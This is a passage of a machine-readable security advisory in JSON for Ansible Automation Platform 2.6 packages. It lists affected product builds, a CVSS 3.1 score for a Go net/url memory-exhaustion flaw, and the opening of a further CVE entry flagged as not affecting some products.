"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2025-68121",
"discovery_date": "2026-02-05T18:01:30.086058+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
